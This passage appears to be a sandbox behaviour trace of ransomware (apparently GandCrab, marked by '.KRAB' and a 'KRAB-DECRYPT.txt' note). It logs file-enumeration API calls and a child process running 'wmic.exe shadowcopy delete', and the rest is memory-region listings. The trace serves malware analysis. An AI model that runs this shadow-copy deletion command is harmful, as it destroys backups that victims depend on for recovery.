param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Videos\\KRAB-DECRYPT.txt.KRAB") returned 44 [0101.450] lstrlenW (lpString="C:\\Users\\Public\\Videos\\KRAB-DECRYPT.txt") returned 39 [0101.450] lstrlenW (lpString=".txt") returned 4 [0101.450] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.451] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0101.451] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.451] lstrlenW (lpString="C:\\Users\\Public\\Videos\\KRAB-DECRYPT.txt") returned 39 [0101.451] lstrlenW (lpString="C:\\Users\\Public\\Videos\\KRAB-DECRYPT.txt") returned 39 [0101.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0101.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0101.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0101.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0101.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0101.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0101.451] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0101.452] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0101.452] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0101.452] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0101.452] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.452] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0101.452] FindClose (in: hFindFile=0xfbdae0 | out: hFindFile=0xfbdae0) returned 1 [0101.452] CloseHandle (hObject=0x320) returned 1 [0101.452] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0 [0101.452] FindClose (in: hFindFile=0xfbdfe0 | out: hFindFile=0xfbdfe0) returned 1 [0101.452] CloseHandle (hObject=0x368) returned 1 [0101.453] FindNextFileW (in: hFindFile=0xfbe060, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 0 [0101.453] FindClose (in: hFindFile=0xfbe060 | out: hFindFile=0xfbe060) returned 1 [0101.453] CloseHandle (hObject=0x360) returned 1 [0101.453] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 1 [0101.453] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0101.453] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0101.453] lstrcatW (in: lpString1="C:\\", lpString2="Windows" | out: lpString1="C:\\Windows") returned="C:\\Windows" [0101.453] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0101.453] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.453] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.454] FindNextFileW (in: hFindFile=0xf8a188, lpFindFileData=0x338f9d0 | out: lpFindFileData=0x338f9d0) returned 0 [0101.454] FindClose (in: hFindFile=0xf8a188 | out: hFindFile=0xf8a188) returned 1 [0101.454] CloseHandle (hObject=0x2d0) returned 1 [0101.454] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.454] RtlExitUserThread (Status=0x0) Thread: id = 7 os_tid = 0xe30 Thread: id = 8 os_tid = 0xe34 Thread: id = 9 os_tid = 0xf80 Thread: id = 10 os_tid = 0xfa4 Thread: id = 11 os_tid = 0xfb4 Thread: id = 12 os_tid = 0xfd8 Thread: id = 13 os_tid = 0xfdc Thread: id = 14 os_tid = 0xb30 Process: id = "2" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x4449b000" os_pid = "0x134" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe14" cmd_line = "\"C:\\Windows\\system32\\wbem\\wmic.exe\" shadowcopy delete" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5291 start_va = 0x830000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 5292 start_va = 0x850000 end_va = 0x851fff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 5293 start_va = 0x860000 end_va = 0x873fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 5294 start_va = 0x880000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 5295 start_va = 0x8c0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 5296 start_va = 0x900000 end_va = 0x903fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 5297 start_va = 0x910000 end_va = 0x910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 5298 start_va = 0x920000 end_va = 0x921fff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 5299 start_va = 0x1370000 end_va = 0x13d3fff entry_point = 0x1370000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 5300 start_va = 0x13e0000 end_va = 0x53dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013e0000" filename = "" Region: id = 5301 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5302 start_va = 0x7f6d0000 end_va = 0x7f6f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6d0000" filename = "" Region: id = 5303 start_va = 0x7f6f5000 end_va = 0x7f6f5fff entry_point = 0x0 region_type = private name = "private_0x000000007f6f5000" filename = "" Region: id = 5304 start_va = 0x7f6f6000 end_va = 0x7f6f6fff entry_point = 0x0 region_type = private name = "private_0x000000007f6f6000" filename = "" Region: id = 5305 start_va = 0x7f6fd000 end_va = 0x7f6fffff entry_point = 0x0 region_type = private name = "private_0x000000007f6fd000" filename = "" Region: id = 5306 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5307 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5308 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5309 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5310 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5311 start_va = 0xad0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 5312 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5313 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5314 start_va = 0xc00000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 5315 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5387 start_va = 0x830000 end_va = 0x83ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 5388 start_va = 0x840000 end_va = 0x843fff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 5389 start_va = 0x930000 end_va = 0x9edfff entry_point = 0x930000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5390 start_va = 0x9f0000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 5391 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 5392 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 5393 start_va = 0xae0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 5394 start_va = 0xb50000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 5395 start_va = 0x73bb0000 end_va = 0x73beefff entry_point = 0x73bb0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5396 start_va = 0x745b0000 end_va = 0x745b7fff entry_point = 0x745b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 5397 start_va = 0x745c0000 end_va = 0x745effff entry_point = 0x745c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 5398 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5399 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5400 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5401 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5402 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5403 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5404 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5405 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5406 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5407 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5408 start_va = 0x7f5d0000 end_va = 0x7f6cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5d0000" filename = "" Region: id = 5409 start_va = 0x7f6f7000 end_va = 0x7f6f9fff entry_point = 0x0 region_type = private name = "private_0x000000007f6f7000" filename = "" Region: id = 5410 start_va = 0x7f6fa000 end_va = 0x7f6fcfff entry_point = 0x0 region_type = private name = "private_0x000000007f6fa000" filename = "" Region: id = 5411 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5412 start_va = 0x850000 end_va = 0x850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 5413 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5414 start_va = 0xab0000 end_va = 0xab0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 5415 start_va = 0x73ba0000 end_va = 0x73bacfff entry_point = 0x73ba0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5416 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5417 start_va = 0x73b30000 end_va = 0x73b95fff entry_point = 0x73b30000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5418 start_va = 0x74910000 end_va = 0x7492afff entry_point = 0x74910000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5419 start_va = 0xd00000 end_va = 0x1036fff entry_point = 0xd00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5420 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5421 start_va = 0x1040000 end_va = 0x1128fff entry_point = 0x1040000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5422 start_va = 0xac0000 end_va = 0xac3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 5423 start_va = 0x739a0000 end_va = 0x73b2ffff entry_point = 0x739a0000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 5424 start_va = 0x1040000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5425 start_va = 0xb60000 end_va = 0xbcffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 5426 start_va = 0x10f0000 end_va = 0x12effff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 5427 start_va = 0x10f0000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 5428 start_va = 0x12e0000 end_va = 0x12effff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 5429 start_va = 0x53e0000 end_va = 0x550ffff entry_point = 0x0 region_type = private name = "private_0x00000000053e0000" filename = "" Region: id = 5430 start_va = 0x10f0000 end_va = 0x11cefff entry_point = 0x10f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5431 start_va = 0x1210000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 5432 start_va = 0x5510000 end_va = 0x590ffff entry_point = 0x0 region_type = private name = "private_0x0000000005510000" filename = "" Region: id = 5433 start_va = 0xb20000 end_va = 0xb20fff entry_point = 0xb20000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 5434 start_va = 0xb30000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 5435 start_va = 0x74240000 end_va = 0x7439ffff entry_point = 0x74240000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 5436 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5437 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5438 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5439 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5440 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5441 start_va = 0x74640000 end_va = 0x74900fff entry_point = 0x74640000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 5442 start_va = 0xb60000 end_va = 0xb89fff entry_point = 0xb60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5443 start_va = 0xbc0000 end_va = 0xbcffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 5444 start_va = 0x5910000 end_va = 0x5a97fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005910000" filename = "" Region: id = 5445 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5446 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5447 start_va = 0xb60000 end_va = 0xb6ffff entry_point = 0xb60000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 5448 start_va = 0x5aa0000 end_va = 0x5c20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005aa0000" filename = "" Region: id = 5449 start_va = 0x5c30000 end_va = 0x702ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005c30000" filename = "" Region: id = 5450 start_va = 0xb70000 end_va = 0xb70fff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 5451 start_va = 0xb80000 end_va = 0xb80fff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 5452 start_va = 0x74950000 end_va = 0x74b73fff entry_point = 0x74950000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 5453 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5454 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 5455 start_va = 0x1040000 end_va = 0x109ffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5456 start_va = 0x10e0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 5457 start_va = 0xb90000 end_va = 0xb90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 5458 start_va = 0x1220000 end_va = 0x12d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 5459 start_va = 0xb90000 end_va = 0xb93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 5460 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 5461 start_va = 0x53e0000 end_va = 0x54dffff entry_point = 0x0 region_type = private name = "private_0x00000000053e0000" filename = "" Region: id = 5462 start_va = 0x5500000 end_va = 0x550ffff entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 5463 start_va = 0x74930000 end_va = 0x74942fff entry_point = 0x74930000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 5464 start_va = 0x74610000 end_va = 0x7463efff entry_point = 0x74610000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5465 start_va = 0x1040000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 5466 start_va = 0x1090000 end_va = 0x109ffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 5467 start_va = 0x10a0000 end_va = 0x10dffff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 5468 start_va = 0x11d0000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 5469 start_va = 0x12f0000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 5470 start_va = 0x1330000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 5471 start_va = 0x7030000 end_va = 0x706ffff entry_point = 0x0 region_type = private name = "private_0x0000000007030000" filename = "" Region: id = 5472 start_va = 0x7f5c7000 end_va = 0x7f5c9fff entry_point = 0x0 region_type = private name = "private_0x000000007f5c7000" filename = "" Region: id = 5473 start_va = 0x7f5ca000 end_va = 0x7f5ccfff entry_point = 0x0 region_type = private name = "private_0x000000007f5ca000" filename = "" Region: id = 5474 start_va = 0x7f5cd000 end_va = 0x7f5cffff entry_point = 0x0 region_type = private name = "private_0x000000007f5cd000" filename = "" Region: id = 5475 start_va = 0x73980000 end_va = 0x73990fff entry_point = 0x73980000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5857 start_va = 0x738c0000 end_va = 0x7397bfff entry_point = 0x738c0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5868 start_va = 0xba0000 end_va = 0xbacfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 6038 start_va = 0x73880000 end_va = 0x7389dfff entry_point = 0x73880000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 6039 start_va = 0xba0000 end_va = 0xba4fff entry_point = 0xba0000 region_type = mapped_file name = "wmiutils.dll.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\wmiutils.dll.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmiutils.dll.mui") Thread: id = 15 os_tid = 0x8d4 [0114.706] GetModuleHandleA (lpModuleName=0x0) returned 0x1370000 [0114.706] __set_app_type (_Type=0x1) [0114.706] __p__fmode () returned 0x77ac4d6c [0114.706] __p__commode () returned 0x77ac5b1c [0114.706] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13aaa90) returned 0x0 [0114.706] __wgetmainargs (in: _Argc=0x13b91a8, _Argv=0x13b91ac, _Env=0x13b91b0, _DoWildCard=0, _StartInfo=0x13b91bc | out: _Argc=0x13b91a8, _Argv=0x13b91ac, _Env=0x13b91b0) returned 0 [0114.730] ??0CHString@@QAE@XZ () returned 0x13b95ec [0114.746] ??0CHString@@QAE@XZ () returned 0x13b98fc [0114.746] ?Empty@CHString@@QAEXXZ () returned 0x73be6424 [0114.746] SetConsoleCtrlHandler (HandlerRoutine=0x13a4980, Add=1) returned 1 [0114.746] _onexit (_Func=0x13b0a20) returned 0x13b0a20 [0114.746] _onexit (_Func=0x13b0a30) returned 0x13b0a30 [0114.746] _onexit (_Func=0x13b0a50) returned 0x13b0a50 [0114.747] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.747] ResolveDelayLoadedAPI () returned 0x770fcd50 [0114.747] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0114.750] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0114.756] CoCreateInstance (in: rclsid=0x1376a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1376a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x13b9510 | out: ppv=0x13b9510*=0xc071c0) returned 0x0 [0115.670] GetCurrentProcess () returned 0xffffffff [0115.670] OpenProcessToken (in: ProcessHandle=0xffffffff, 